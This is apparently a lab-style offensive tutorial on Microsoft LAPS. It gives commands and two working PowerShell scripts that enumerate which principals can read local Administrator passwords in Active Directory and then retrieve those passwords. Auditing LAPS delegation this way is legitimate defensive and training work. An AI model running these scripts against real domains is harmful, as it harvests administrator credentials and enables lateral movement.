LAPS
With MS14-025 (May 2014) Microsoft removed the ability to set local account passwords through Group Policy Preferences, which had stored them in SYSVOL as a cpassword value encrypted with a publicly documented AES key. In 2015 it released the Local Administrator Password Solution (LAPS), a much safer way to manage the local Administrator password remotely: every managed computer gets its own random password, rotated on a schedule and stored in Active Directory.
LAPS adds two attributes to the computer object: ms-Mcs-AdmPwd, which holds the local Administrator password in clear text, and ms-Mcs-AdmPwdExpirationTime, which holds the time (a Windows FILETIME value) at which the password is due to be reset. ms-Mcs-AdmPwd is marked confidential in the schema, so ordinary read permission on the object is not enough to retrieve it; the reader needs the All Extended Rights (CONTROL_ACCESS) permission on the computer object. The Group Policy client-side extension AdmPwd.dll changes the local password on the machine and writes the new value into ms-Mcs-AdmPwd.
Enumerating LAPS
First, check whether LAPS is installed on the target machine by looking for the client-side extension, AdmPwd.dll, in its default path. The AdmPwd.PS PowerShell module that provides the management cmdlets used below is a separate component, normally found on admin workstations rather than on every managed host, so also check whether it is available on the machine you are working from.
:: The file AdmPwd.dll should be present
dir "C:\Program Files\LAPS\CSE"
Directory of C:\Program Files\LAPS\CSE
06/06/2022 01:01 PM .
06/06/2022 01:01 PM ..
05/05/2021 07:04 AM 184,232 AdmPwd.dll
:: Check the available AdmPwd cmdlets (PowerShell; requires the AdmPwd.PS module)
Get-Command *AdmPwd*
Next, find out who is allowed to read the password. Reading ms-Mcs-AdmPwd requires the All Extended Rights permission, which is normally delegated at the OU level to a group such as a helpdesk or workstation-admin group. The Find-AdmPwdExtendedRights cmdlet reports, per OU, the principals holding that right.
# List the extended-rights holders for every OU
Find-AdmPwdExtendedRights -Identity *
ObjectDN ExtendedRightHolders
-------- --------------------
OU=ADOBEOrg,DC=thm,DC=red {ADOBE\GroupName}
Once we know which group holds extended rights on the OU, enumerate that group and its members. The end goal is to compromise one of those accounts, since any member can read the LAPS password of every computer under that OU. These are domain groups and users, so query the domain rather than the local SAM:
:: Group information
net group "Group Name" /domain
:: User information (names found from the command above)
net user "Username" /domain
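The cmdlet-based check above only works where the AdmPwd.PS module is installed. The following is an added example, not code from the original page or from Microsoft's LAPS tooling, that does the same enumeration directly over LDAP with System.DirectoryServices: it looks up the schemaIDGUID of ms-Mcs-AdmPwd, walks the ACL of the domain root and every OU, and reports each Allow ACE that grants ExtendedRight either for all extended rights (empty GUID) or specifically for the LAPS attribute. Function names (Get-LapsSchemaGuid, Find-LapsReaders) are the example's own, and it assumes it is run as a domain user on a domain-joined host that can read OU security descriptors.

```powershell
# Added example (not from the page): who can read ms-Mcs-AdmPwd, found by walking OU ACLs.
# Assumes a domain-joined host and a domain user; no AdmPwd.PS module needed.
Add-Type -AssemblyName System.DirectoryServices

function Get-LapsSchemaGuid {
    # ms-Mcs-AdmPwd is confidential: an ACE granting ExtendedRight scoped to its
    # schemaIDGUID (or to all extended rights, the empty GUID) is what allows reading it.
    $rootDse  = [ADSI]"LDAP://RootDSE"
    $schemaNc = $rootDse.schemaNamingContext.Value
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$schemaNc"
    $searcher.Filter = "(&(objectClass=attributeSchema)(lDAPDisplayName=ms-Mcs-AdmPwd))"
    [void]$searcher.PropertiesToLoad.Add("schemaIDGUID")
    $result = $searcher.FindOne()
    if (-not $result) { throw "ms-Mcs-AdmPwd is not in the schema: LAPS schema extension not applied" }
    # schemaIDGUID is stored as a 16-byte octet string
    return [Guid]$result.Properties["schemaidguid"][0]
}

function Find-LapsReaders {
    param(
        # Hypothetical parameter: where to start the OU walk (defaults to the domain root)
        [string]$SearchBase = ([ADSI]"LDAP://RootDSE").defaultNamingContext.Value
    )
    $lapsGuid = Get-LapsSchemaGuid
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$SearchBase"
    # Delegation can sit on the domain head as well as on OUs, so include both
    $searcher.Filter   = "(|(objectClass=organizationalUnit)(objectClass=domainDNS))"
    $searcher.PageSize = 500

    foreach ($ou in $searcher.FindAll()) {
        $entry = $ou.GetDirectoryEntry()
        $dn    = $entry.distinguishedName.Value
        try {
            $acl = $entry.ObjectSecurity
        } catch {
            Write-Warning "Cannot read the security descriptor of $dn"
            continue
        }
        # Include inherited ACEs: a right granted higher up still applies to this OU
        foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # GenericAll contains the ExtendedRight bit, so full-control holders are caught too
            if (-not $ace.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)) { continue }
            $scope = if ($ace.ObjectType -eq [Guid]::Empty) { 'All Extended Rights' }
                     elseif ($ace.ObjectType -eq $lapsGuid) { 'ms-Mcs-AdmPwd (CONTROL_ACCESS)' }
                     else { continue }   # some other extended right, e.g. password reset
            [PSCustomObject]@{
                ObjectDN  = $dn
                Principal = $ace.IdentityReference.Value
                Right     = $scope
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Every principal that can read LAPS passwords, and the OU the right applies to
Find-LapsReaders | Sort-Object ObjectDN, Principal | Format-Table -AutoSize
```

Principals listed with All Extended Rights can also reset passwords and perform every other extended operation on objects under that OU, so they are higher-value targets than a group that was delegated only the ms-Mcs-AdmPwd right.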
Getting the Password
Once one of those accounts is compromised, the Get-AdmPwdPassword cmdlet returns the password for a computer with LAPS enabled, given the target's name in -ComputerName. If the account does not hold the required right, the Password column comes back empty rather than raising an error, so an empty result means "not permitted", not "no LAPS". Watch the expiration timestamp as well: a principal with write access to ms-Mcs-AdmPwdExpirationTime can push it far into the future so that the password is never rotated, unless the LAPS policy "Do not allow password expiration time longer than required by policy" is enabled.
Get-AdmPwdPassword -ComputerName *
ComputerName DistinguishedName Password ExpirationTimestamp
------------ ----------------- -------- -------------------
PC-GREEN CN=PC-GREEN,OU=ADOBEOrg,DC=thm,DC=red Password 2/11/2338 11:05:2...
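The following is an added example, not code from the original page or from Microsoft's LAPS tooling, that reads the two LAPS attributes straight over LDAP with System.DirectoryServices, so it works from any domain-joined host without the AdmPwd.PS module. It filters on ms-Mcs-AdmPwdExpirationTime, which authenticated users can read by default, to find the computers LAPS manages; ms-Mcs-AdmPwd is only present in the result when the current account holds the extended right, so the Readable column separates "no rights" from "not managed". The expiration FILETIME is decoded to a UTC timestamp and flagged when stale. The function name Get-LapsPasswords and its parameters are the example's own.

```powershell
# Added example (not from the page): LAPS-managed computers, their passwords (where
# readable) and decoded expiration times, via LDAP with System.DirectoryServices.
# Assumes a domain-joined host and the current domain user's credentials.
Add-Type -AssemblyName System.DirectoryServices

function Get-LapsPasswords {
    param(
        # Hypothetical parameters: search base (defaults to the domain root) and an
        # LDAP wildcard on the computer name, e.g. "PC-*"
        [string]$SearchBase     = ([ADSI]"LDAP://RootDSE").defaultNamingContext.Value,
        [string]$ComputerFilter = "*"
    )
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$SearchBase"
    # ms-Mcs-AdmPwdExpirationTime is readable by authenticated users by default, so it is the
    # reliable marker for "LAPS manages this host". ms-Mcs-AdmPwd is confidential and is only
    # returned when we hold All Extended Rights / CONTROL_ACCESS on the computer object.
    $searcher.Filter   = "(&(objectCategory=computer)(ms-Mcs-AdmPwdExpirationTime=*)(name=$ComputerFilter))"
    $searcher.PageSize = 500
    foreach ($p in 'name', 'distinguishedName', 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime') {
        [void]$searcher.PropertiesToLoad.Add($p)
    }

    foreach ($r in $searcher.FindAll()) {
        $props = $r.Properties   # keys are lower-cased by DirectorySearcher
        # The expiration is a Windows FILETIME (100 ns ticks since 1601-01-01 UTC),
        # returned by DirectorySearcher as an Int64
        $expiry = [DateTime]::FromFileTimeUtc([long]$props['ms-mcs-admpwdexpirationtime'][0])
        $pwd = if ($props.Contains('ms-mcs-admpwd')) { [string]$props['ms-mcs-admpwd'][0] } else { $null }
        [PSCustomObject]@{
            ComputerName      = [string]$props['name'][0]
            DistinguishedName = [string]$props['distinguishedname'][0]
            Readable          = [bool]$pwd
            Password          = $pwd
            ExpirationUtc     = $expiry
            # Stale or absurdly distant expirations hint at a broken CSE or a tampered attribute
            Expired           = ($expiry -lt [DateTime]::UtcNow)
        }
    }
}

# Which hosts LAPS manages, which passwords this account can read, and which are stale
Get-LapsPasswords | Format-Table ComputerName, Readable, Expired, ExpirationUtc, Password -AutoSize
```

Because the filter never references ms-Mcs-AdmPwd itself, the query is cheap and does not depend on the caller's rights; rerun it after compromising a delegated account and the Readable column shows which machines that account unlocks.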
Other
In most Active Directory environments LAPS is deployed only to specific OUs or machines, so the target computer has to be enumerated as carefully as the account that can read its password.
One script that helps with this enumeration is LAPSToolkit. It builds on PowerView to audit and attack Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS).
LAPSToolkit
# Displays all computers with LAPS enabled, their password expiration, and the password if the current user has access
Get-LAPSComputers
# Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute
Find-LAPSDelegatedGroups
# Parses the extended rights of each LAPS-enabled computer, showing which groups have read access and whether any user holds All Extended Rights
Find-AdmPwdExtendedRights